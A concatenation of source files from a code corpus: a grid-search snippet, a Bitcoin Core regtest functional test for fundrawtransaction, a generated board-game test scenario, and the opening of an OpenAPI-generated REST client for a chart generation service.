verbose=10, n_jobs=-1, iid=True, refit=True, cv=5)
# Fit Grid Search Model
model.fit(s_data, s_labels)
print("Best score: %0.3f" % model.best_score_)
print("Best parameters set:")
best_parameters = model.best_estimator_.get_params()
for param_name in sorted(param_grid.keys()):
print("\t%s: %r" % (param_name, best_parameters[param_name]))
# # Get best model
# best_model = model.best_estimator_
#
# # Fit model with best parameters optimized for quadratic_weighted_kappa
# best_model.fit(s_data, s_labels)
# preds = best_model.predict(t_data)
| 42.104651 | 260 | 0.67799 |
82c9e48a497356262b95f37312dffff6546221d1 | 24,507 | py | Python | qa/rpc-tests/fundrawtransaction.py | Kangmo/bitcoin | a9149688f87cb790a600400abd9af72c3ee0c312 | [
"MIT"
] | null | null | null | qa/rpc-tests/fundrawtransaction.py | Kangmo/bitcoin | a9149688f87cb790a600400abd9af72c3ee0c312 | [
"MIT"
] | null | null | null | qa/rpc-tests/fundrawtransaction.py | Kangmo/bitcoin | a9149688f87cb790a600400abd9af72c3ee0c312 | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# Copyright (c) 2014-2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
# Create one-input, one-output, no-fee transaction:
class RawTransactionsTest(BitcoinTestFramework):
def setup_chain(self):
print("Initializing test directory "+self.options.tmpdir)
initialize_chain_clean(self.options.tmpdir, 4)
def setup_network(self, split=False):
self.nodes = start_nodes(4, self.options.tmpdir)
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
connect_nodes_bi(self.nodes,0,3)
self.is_network_split=False
self.sync_all()
def run_test(self):
print "Mining blocks..."
min_relay_tx_fee = self.nodes[0].getnetworkinfo()['relayfee']
# This test is not meant to test fee estimation and we'd like
# to be sure all txs are sent at a consistent desired feerate
for node in self.nodes:
node.settxfee(min_relay_tx_fee)
# if the fee's positive delta is higher than this value tests will fail,
# neg. delta always fail the tests.
# The size of the signature of every input may be at most 2 bytes larger
# than a minimum sized signature.
# = 2 bytes * minRelayTxFeePerByte
feeTolerance = 2 * min_relay_tx_fee/1000
self.nodes[2].generate(1)
self.sync_all()
self.nodes[0].generate(121)
self.sync_all()
watchonly_address = self.nodes[0].getnewaddress()
watchonly_pubkey = self.nodes[0].validateaddress(watchonly_address)["pubkey"]
watchonly_amount = Decimal(200)
self.nodes[3].importpubkey(watchonly_pubkey, "", True)
watchonly_txid = self.nodes[0].sendtoaddress(watchonly_address, watchonly_amount)
self.nodes[0].sendtoaddress(self.nodes[3].getnewaddress(), watchonly_amount / 10)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.5)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 5.0)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
###############
# simple test #
###############
inputs = [ ]
outputs = { self.nodes[0].getnewaddress() : 1.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
assert(len(dec_tx['vin']) > 0) #test if we have enought inputs
##############################
# simple test with two coins #
##############################
inputs = [ ]
outputs = { self.nodes[0].getnewaddress() : 2.2 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
assert(len(dec_tx['vin']) > 0) #test if we have enough inputs
##############################
# simple test with two coins #
##############################
inputs = [ ]
outputs = { self.nodes[0].getnewaddress() : 2.6 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
assert(len(dec_tx['vin']) > 0)
assert_equal(dec_tx['vin'][0]['scriptSig']['hex'], '')
################################
# simple test with two outputs #
################################
inputs = [ ]
outputs = { self.nodes[0].getnewaddress() : 2.6, self.nodes[1].getnewaddress() : 2.5 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
for out in dec_tx['vout']:
totalOut += out['value']
assert(len(dec_tx['vin']) > 0)
assert_equal(dec_tx['vin'][0]['scriptSig']['hex'], '')
#########################################################################
# test a fundrawtransaction with a VIN greater than the required amount #
#########################################################################
utx = False
listunspent = self.nodes[2].listunspent()
for aUtx in listunspent:
if aUtx['amount'] == 5.0:
utx = aUtx
break
assert(utx!=False)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']}]
outputs = { self.nodes[0].getnewaddress() : 1.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
for out in dec_tx['vout']:
totalOut += out['value']
assert_equal(fee + totalOut, utx['amount']) #compare vin total and totalout+fee
#####################################################################
# test a fundrawtransaction with which will not get a change output #
#####################################################################
utx = False
listunspent = self.nodes[2].listunspent()
for aUtx in listunspent:
if aUtx['amount'] == 5.0:
utx = aUtx
break
assert(utx!=False)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']}]
outputs = { self.nodes[0].getnewaddress() : Decimal(5.0) - fee - feeTolerance }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
for out in dec_tx['vout']:
totalOut += out['value']
assert_equal(rawtxfund['changepos'], -1)
assert_equal(fee + totalOut, utx['amount']) #compare vin total and totalout+fee
#########################################################################
# test a fundrawtransaction with a VIN smaller than the required amount #
#########################################################################
utx = False
listunspent = self.nodes[2].listunspent()
for aUtx in listunspent:
if aUtx['amount'] == 1.0:
utx = aUtx
break
assert(utx!=False)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']}]
outputs = { self.nodes[0].getnewaddress() : 1.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
# 4-byte version + 1-byte vin count + 36-byte prevout then script_len
rawtx = rawtx[:82] + "0100" + rawtx[84:]
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
assert_equal("00", dec_tx['vin'][0]['scriptSig']['hex'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
matchingOuts = 0
for i, out in enumerate(dec_tx['vout']):
totalOut += out['value']
if out['scriptPubKey']['addresses'][0] in outputs:
matchingOuts+=1
else:
assert_equal(i, rawtxfund['changepos'])
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
assert_equal("00", dec_tx['vin'][0]['scriptSig']['hex'])
assert_equal(matchingOuts, 1)
assert_equal(len(dec_tx['vout']), 2)
###########################################
# test a fundrawtransaction with two VINs #
###########################################
utx = False
utx2 = False
listunspent = self.nodes[2].listunspent()
for aUtx in listunspent:
if aUtx['amount'] == 1.0:
utx = aUtx
if aUtx['amount'] == 5.0:
utx2 = aUtx
assert(utx!=False)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']},{'txid' : utx2['txid'], 'vout' : utx2['vout']} ]
outputs = { self.nodes[0].getnewaddress() : 6.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
matchingOuts = 0
for out in dec_tx['vout']:
totalOut += out['value']
if out['scriptPubKey']['addresses'][0] in outputs:
matchingOuts+=1
assert_equal(matchingOuts, 1)
assert_equal(len(dec_tx['vout']), 2)
matchingIns = 0
for vinOut in dec_tx['vin']:
for vinIn in inputs:
if vinIn['txid'] == vinOut['txid']:
matchingIns+=1
assert_equal(matchingIns, 2) #we now must see two vins identical to vins given as params
#########################################################
# test a fundrawtransaction with two VINs and two vOUTs #
#########################################################
utx = False
utx2 = False
listunspent = self.nodes[2].listunspent()
for aUtx in listunspent:
if aUtx['amount'] == 1.0:
utx = aUtx
if aUtx['amount'] == 5.0:
utx2 = aUtx
assert(utx!=False)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']},{'txid' : utx2['txid'], 'vout' : utx2['vout']} ]
outputs = { self.nodes[0].getnewaddress() : 6.0, self.nodes[0].getnewaddress() : 1.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
matchingOuts = 0
for out in dec_tx['vout']:
totalOut += out['value']
if out['scriptPubKey']['addresses'][0] in outputs:
matchingOuts+=1
assert_equal(matchingOuts, 2)
assert_equal(len(dec_tx['vout']), 3)
##############################################
# test a fundrawtransaction with invalid vin #
##############################################
listunspent = self.nodes[2].listunspent()
inputs = [ {'txid' : "1c7f966dab21119bac53213a2bc7532bff1fa844c124fd750a7d0b1332440bd1", 'vout' : 0} ] #invalid vin!
outputs = { self.nodes[0].getnewaddress() : 1.0}
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
try:
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
raise AssertionError("Spent more than available")
except JSONRPCException as e:
assert("Insufficient" in e.error['message'])
############################################################
#compare fee of a standard pubkeyhash transaction
inputs = []
outputs = {self.nodes[1].getnewaddress():1.1}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[0].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 1.1)
signedFee = self.nodes[0].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance)
############################################################
############################################################
#compare fee of a standard pubkeyhash transaction with multiple outputs
inputs = []
outputs = {self.nodes[1].getnewaddress():1.1,self.nodes[1].getnewaddress():1.2,self.nodes[1].getnewaddress():0.1,self.nodes[1].getnewaddress():1.3,self.nodes[1].getnewaddress():0.2,self.nodes[1].getnewaddress():0.3}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[0].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[0].sendmany("", outputs)
signedFee = self.nodes[0].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance)
############################################################
############################################################
#compare fee of a 2of2 multisig p2sh transaction
# create 2of2 addr
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[1].getnewaddress()
addr1Obj = self.nodes[1].validateaddress(addr1)
addr2Obj = self.nodes[1].validateaddress(addr2)
mSigObj = self.nodes[1].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])
inputs = []
outputs = {mSigObj:1.1}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[0].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[0].sendtoaddress(mSigObj, 1.1)
signedFee = self.nodes[0].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance)
############################################################
############################################################
#compare fee of a standard pubkeyhash transaction
# create 4of5 addr
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[1].getnewaddress()
addr3 = self.nodes[1].getnewaddress()
addr4 = self.nodes[1].getnewaddress()
addr5 = self.nodes[1].getnewaddress()
addr1Obj = self.nodes[1].validateaddress(addr1)
addr2Obj = self.nodes[1].validateaddress(addr2)
addr3Obj = self.nodes[1].validateaddress(addr3)
addr4Obj = self.nodes[1].validateaddress(addr4)
addr5Obj = self.nodes[1].validateaddress(addr5)
mSigObj = self.nodes[1].addmultisigaddress(4, [addr1Obj['pubkey'], addr2Obj['pubkey'], addr3Obj['pubkey'], addr4Obj['pubkey'], addr5Obj['pubkey']])
inputs = []
outputs = {mSigObj:1.1}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[0].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[0].sendtoaddress(mSigObj, 1.1)
signedFee = self.nodes[0].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance)
############################################################
############################################################
# spend a 2of2 multisig transaction over fundraw
# create 2of2 addr
addr1 = self.nodes[2].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[2].validateaddress(addr1)
addr2Obj = self.nodes[2].validateaddress(addr2)
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])
# send 1.2 BTC to msig addr
txId = self.nodes[0].sendtoaddress(mSigObj, 1.2)
self.sync_all()
self.nodes[1].generate(1)
self.sync_all()
oldBalance = self.nodes[1].getbalance()
inputs = []
outputs = {self.nodes[1].getnewaddress():1.1}
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[2].fundrawtransaction(rawTx)
signedTx = self.nodes[2].signrawtransaction(fundedTx['hex'])
txId = self.nodes[2].sendrawtransaction(signedTx['hex'])
self.sync_all()
self.nodes[1].generate(1)
self.sync_all()
# make sure funds are received at node1
assert_equal(oldBalance+Decimal('1.10000000'), self.nodes[1].getbalance())
############################################################
# locked wallet test
self.nodes[1].encryptwallet("test")
self.nodes.pop(1)
stop_nodes(self.nodes)
wait_bitcoinds()
self.nodes = start_nodes(4, self.options.tmpdir)
# This test is not meant to test fee estimation and we'd like
# to be sure all txs are sent at a consistent desired feerate
for node in self.nodes:
node.settxfee(min_relay_tx_fee)
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
connect_nodes_bi(self.nodes,0,3)
self.is_network_split=False
self.sync_all()
try:
self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 1.2)
raise AssertionError("Wallet unlocked without passphrase")
except JSONRPCException as e:
assert('walletpassphrase' in e.error['message'])
oldBalance = self.nodes[0].getbalance()
inputs = []
outputs = {self.nodes[0].getnewaddress():1.1}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[1].fundrawtransaction(rawTx)
#now we need to unlock
self.nodes[1].walletpassphrase("test", 100)
signedTx = self.nodes[1].signrawtransaction(fundedTx['hex'])
txId = self.nodes[1].sendrawtransaction(signedTx['hex'])
self.sync_all()
self.nodes[1].generate(1)
self.sync_all()
# make sure funds are received at node1
assert_equal(oldBalance+Decimal('51.10000000'), self.nodes[0].getbalance())
###############################################
# multiple (~19) inputs tx test | Compare fee #
###############################################
#empty node1, send some small coins from node0 to node1
self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), self.nodes[1].getbalance(), "", "", True)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
for i in range(0,20):
self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.01)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
#fund a tx with ~20 small inputs
inputs = []
outputs = {self.nodes[0].getnewaddress():0.15,self.nodes[0].getnewaddress():0.04}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[1].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[1].sendmany("", outputs)
signedFee = self.nodes[1].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance*19) #~19 inputs
#############################################
# multiple (~19) inputs tx test | sign/send #
#############################################
#again, empty node1, send some small coins from node0 to node1
self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), self.nodes[1].getbalance(), "", "", True)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
for i in range(0,20):
self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.01)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
#fund a tx with ~20 small inputs
oldBalance = self.nodes[0].getbalance()
inputs = []
outputs = {self.nodes[0].getnewaddress():0.15,self.nodes[0].getnewaddress():0.04}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[1].fundrawtransaction(rawTx)
fundedAndSignedTx = self.nodes[1].signrawtransaction(fundedTx['hex'])
txId = self.nodes[1].sendrawtransaction(fundedAndSignedTx['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(oldBalance+Decimal('50.19000000'), self.nodes[0].getbalance()) #0.19+block reward
#####################################################
# test fundrawtransaction with OP_RETURN and no vin #
#####################################################
rawtx = "0100000000010000000000000000066a047465737400000000"
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(len(dec_tx['vin']), 0)
assert_equal(len(dec_tx['vout']), 1)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
assert_greater_than(len(dec_tx['vin']), 0) # at least one vin
assert_equal(len(dec_tx['vout']), 2) # one change output added
##################################################
# test a fundrawtransaction using only watchonly #
##################################################
inputs = []
outputs = {self.nodes[2].getnewaddress() : watchonly_amount / 2}
rawtx = self.nodes[3].createrawtransaction(inputs, outputs)
result = self.nodes[3].fundrawtransaction(rawtx, True)
res_dec = self.nodes[0].decoderawtransaction(result["hex"])
assert_equal(len(res_dec["vin"]), 1)
assert_equal(res_dec["vin"][0]["txid"], watchonly_txid)
assert("fee" in result.keys())
assert_greater_than(result["changepos"], -1)
###############################################################
# test fundrawtransaction using the entirety of watched funds #
###############################################################
inputs = []
outputs = {self.nodes[2].getnewaddress() : watchonly_amount}
rawtx = self.nodes[3].createrawtransaction(inputs, outputs)
result = self.nodes[3].fundrawtransaction(rawtx, True)
res_dec = self.nodes[0].decoderawtransaction(result["hex"])
assert_equal(len(res_dec["vin"]), 2)
assert(res_dec["vin"][0]["txid"] == watchonly_txid or res_dec["vin"][1]["txid"] == watchonly_txid)
assert_greater_than(result["fee"], 0)
assert_greater_than(result["changepos"], -1)
assert_equal(result["fee"] + res_dec["vout"][result["changepos"]]["value"], watchonly_amount / 10)
signedtx = self.nodes[3].signrawtransaction(result["hex"])
assert(not signedtx["complete"])
signedtx = self.nodes[0].signrawtransaction(signedtx["hex"])
assert(signedtx["complete"])
self.nodes[0].sendrawtransaction(signedtx["hex"])
if __name__ == '__main__':
RawTransactionsTest().main()
| 40.307566 | 223 | 0.555066 |
766ff54b42078ba645fd047c4f96ec0e618631df | 4,269 | py | Python | z2/part2/interactive/jm/random_normal_1/253914328.py | kozakusek/ipp-2020-testy | 09aa008fa53d159672cc7cbf969a6b237e15a7b8 | [
"MIT"
] | 1 | 2020-04-16T12:13:47.000Z | 2020-04-16T12:13:47.000Z | z2/part2/interactive/jm/random_normal_1/253914328.py | kozakusek/ipp-2020-testy | 09aa008fa53d159672cc7cbf969a6b237e15a7b8 | [
"MIT"
] | 18 | 2020-03-06T17:50:15.000Z | 2020-05-19T14:58:30.000Z | z2/part2/interactive/jm/random_normal_1/253914328.py | kozakusek/ipp-2020-testy | 09aa008fa53d159672cc7cbf969a6b237e15a7b8 | [
"MIT"
] | 18 | 2020-03-06T17:45:13.000Z | 2020-06-09T19:18:31.000Z | from part1 import (
gamma_board,
gamma_busy_fields,
gamma_delete,
gamma_free_fields,
gamma_golden_move,
gamma_golden_possible,
gamma_move,
gamma_new,
)
"""
scenario: test_random_actions
uuid: 253914328
"""
"""
random actions, total chaos
"""
board = gamma_new(8, 4, 6, 2)
assert board is not None
assert gamma_move(board, 1, 2, 0) == 1
assert gamma_move(board, 2, 0, 3) == 1
assert gamma_move(board, 3, 6, 1) == 1
assert gamma_move(board, 3, 7, 1) == 1
assert gamma_move(board, 4, 4, 1) == 1
assert gamma_move(board, 5, 0, 5) == 0
assert gamma_move(board, 6, 1, 2) == 1
assert gamma_move(board, 6, 6, 3) == 1
assert gamma_golden_possible(board, 6) == 1
assert gamma_move(board, 1, 1, 2) == 0
assert gamma_move(board, 1, 4, 1) == 0
assert gamma_move(board, 2, 0, 0) == 1
assert gamma_free_fields(board, 2) == 4
assert gamma_move(board, 3, 3, 3) == 1
assert gamma_move(board, 3, 2, 1) == 0
assert gamma_move(board, 4, 0, 4) == 0
assert gamma_move(board, 5, 7, 2) == 1
assert gamma_move(board, 5, 3, 3) == 0
assert gamma_busy_fields(board, 5) == 1
assert gamma_free_fields(board, 5) == 22
assert gamma_move(board, 6, 4, 1) == 0
assert gamma_move(board, 1, 2, 3) == 1
assert gamma_busy_fields(board, 1) == 2
assert gamma_move(board, 2, 1, 3) == 1
assert gamma_move(board, 3, 4, 0) == 0
assert gamma_move(board, 3, 1, 3) == 0
assert gamma_move(board, 4, 1, 3) == 0
assert gamma_move(board, 4, 5, 2) == 1
assert gamma_busy_fields(board, 4) == 2
assert gamma_move(board, 5, 3, 7) == 0
assert gamma_move(board, 5, 6, 3) == 0
assert gamma_move(board, 6, 6, 1) == 0
assert gamma_golden_possible(board, 6) == 1
assert gamma_move(board, 2, 1, 0) == 1
assert gamma_move(board, 2, 4, 3) == 0
assert gamma_move(board, 3, 4, 2) == 0
assert gamma_move(board, 4, 3, 2) == 0
assert gamma_busy_fields(board, 4) == 2
assert gamma_move(board, 5, 2, 6) == 0
assert gamma_move(board, 6, 1, 5) == 0
assert gamma_busy_fields(board, 6) == 2
assert gamma_move(board, 1, 7, 3) == 0
assert gamma_move(board, 1, 4, 1) == 0
assert gamma_busy_fields(board, 1) == 2
assert gamma_move(board, 2, 0, 4) == 0
assert gamma_move(board, 2, 1, 3) == 0
assert gamma_move(board, 3, 5, 1) == 1
assert gamma_move(board, 3, 0, 2) == 0
assert gamma_move(board, 4, 0, 2) == 0
assert gamma_move(board, 4, 4, 2) == 1
assert gamma_move(board, 5, 2, 1) == 1
assert gamma_move(board, 5, 5, 2) == 0
assert gamma_move(board, 6, 0, 7) == 0
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 2, 3) == 0
assert gamma_move(board, 3, 1, 3) == 0
assert gamma_move(board, 4, 2, 0) == 0
assert gamma_move(board, 4, 3, 3) == 0
assert gamma_move(board, 5, 0, 7) == 0
assert gamma_move(board, 6, 0, 5) == 0
assert gamma_free_fields(board, 6) == 6
assert gamma_move(board, 1, 2, 0) == 0
assert gamma_move(board, 1, 0, 3) == 0
assert gamma_move(board, 2, 3, 5) == 0
assert gamma_move(board, 2, 2, 1) == 0
assert gamma_move(board, 3, 4, 1) == 0
assert gamma_busy_fields(board, 3) == 4
assert gamma_free_fields(board, 3) == 6
assert gamma_move(board, 5, 2, 0) == 0
assert gamma_move(board, 1, 1, 3) == 0
assert gamma_free_fields(board, 1) == 2
assert gamma_move(board, 2, 2, 2) == 0
assert gamma_move(board, 2, 5, 2) == 0
assert gamma_move(board, 3, 1, 0) == 0
assert gamma_move(board, 5, 0, 7) == 0
assert gamma_move(board, 6, 2, 6) == 0
assert gamma_move(board, 1, 0, 3) == 0
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_golden_possible(board, 2) == 1
assert gamma_move(board, 4, 0, 5) == 0
assert gamma_move(board, 5, 0, 3) == 0
assert gamma_move(board, 5, 5, 0) == 0
assert gamma_move(board, 1, 0, 6) == 0
assert gamma_free_fields(board, 1) == 2
assert gamma_busy_fields(board, 2) == 4
assert gamma_move(board, 3, 3, 4) == 0
assert gamma_move(board, 3, 1, 0) == 0
assert gamma_move(board, 4, 0, 7) == 0
assert gamma_move(board, 4, 7, 1) == 0
assert gamma_move(board, 5, 2, 2) == 1
assert gamma_move(board, 5, 4, 2) == 0
assert gamma_move(board, 6, 0, 7) == 0
assert gamma_move(board, 1, 4, 1) == 0
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_move(board, 2, 7, 0) == 0
assert gamma_move(board, 3, 3, 7) == 0
assert gamma_move(board, 4, 1, 2) == 0
gamma_delete(board)
| 34.707317 | 44 | 0.650972 |
e35601bef436cf5df222c59d1a06b8defa070c0d | 14,300 | py | Python | code/python/ChartGenerationService/v1/fds/sdk/ChartGenerationService/rest.py | factset/enterprise-sdk | 3fd4d1360756c515c9737a0c9a992c7451d7de7e | [
"Apache-2.0"
] | 6 | 2022-02-07T16:34:18.000Z | 2022-03-30T08:04:57.000Z | code/python/ChartGenerationService/v1/fds/sdk/ChartGenerationService/rest.py | factset/enterprise-sdk | 3fd4d1360756c515c9737a0c9a992c7451d7de7e | [
"Apache-2.0"
] | 2 | 2022-02-07T05:25:57.000Z | 2022-03-07T14:18:04.000Z | code/python/ChartGenerationService/v1/fds/sdk/ChartGenerationService/rest.py | factset/enterprise-sdk | 3fd4d1360756c515c9737a0c9a992c7451d7de7e | [
"Apache-2.0"
] | null | null | null | """
Chart Generation Service
This is a service for generating charts in a node environment that were created using web charting and get back images in form of `PNGs` and `JPEGs` as response. # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import io
import json
import logging
import re
import ssl
from urllib.parse import urlencode
from urllib.parse import urlparse
from urllib.request import proxy_bypass_environment
import urllib3
import ipaddress
from fds.sdk.ChartGenerationService.exceptions import ApiException, UnauthorizedException, ForbiddenException, NotFoundException, ServiceException, ApiValueError
logger = logging.getLogger(__name__)
class RESTResponse(io.IOBase):
def __init__(self, resp):
self.urllib3_response = resp
self.status = resp.status
self.reason = resp.reason
self.data = resp.data
def getheaders(self):
"""Returns a dictionary of the response headers."""
return self.urllib3_response.getheaders()
def getheader(self, name, default=None):
"""Returns a given response header."""
return self.urllib3_response.getheader(name, default)
class RESTClientObject(object):
def __init__(self, configuration, pools_size=4, maxsize=None):
# urllib3.PoolManager will pass all kw parameters to connectionpool
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/poolmanager.py#L75 # noqa: E501
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/connectionpool.py#L680 # noqa: E501
# maxsize is the number of requests to host that are allowed in parallel # noqa: E501
# Custom SSL certificates and client certificates: http://urllib3.readthedocs.io/en/latest/advanced-usage.html # noqa: E501
# cert_reqs
if configuration.verify_ssl:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
addition_pool_args = {}
if configuration.assert_hostname is not None:
addition_pool_args['assert_hostname'] = configuration.assert_hostname # noqa: E501
if configuration.retries is not None:
addition_pool_args['retries'] = configuration.retries
if configuration.socket_options is not None:
addition_pool_args['socket_options'] = configuration.socket_options
if maxsize is None:
if configuration.connection_pool_maxsize is not None:
maxsize = configuration.connection_pool_maxsize
else:
maxsize = 4
# https pool manager
if configuration.proxy and not should_bypass_proxies(configuration.host, no_proxy=configuration.no_proxy or ''):
self.pool_manager = urllib3.ProxyManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=configuration.ssl_ca_cert,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
proxy_url=configuration.proxy,
proxy_headers=configuration.proxy_headers,
**addition_pool_args
)
else:
self.pool_manager = urllib3.PoolManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=configuration.ssl_ca_cert,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
**addition_pool_args
)
def request(self, method, url, query_params=None, headers=None,
body=None, post_params=None, _preload_content=True,
_request_timeout=None):
"""Perform requests.
:param method: http request method
:param url: http request url
:param query_params: query parameters in the url
:param headers: http request headers
:param body: request json body, for `application/json`
:param post_params: request post parameters,
`application/x-www-form-urlencoded`
and `multipart/form-data`
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
"""
method = method.upper()
assert method in ['GET', 'HEAD', 'DELETE', 'POST', 'PUT',
'PATCH', 'OPTIONS']
if post_params and body:
raise ApiValueError(
"body parameter cannot be used with post_params parameter."
)
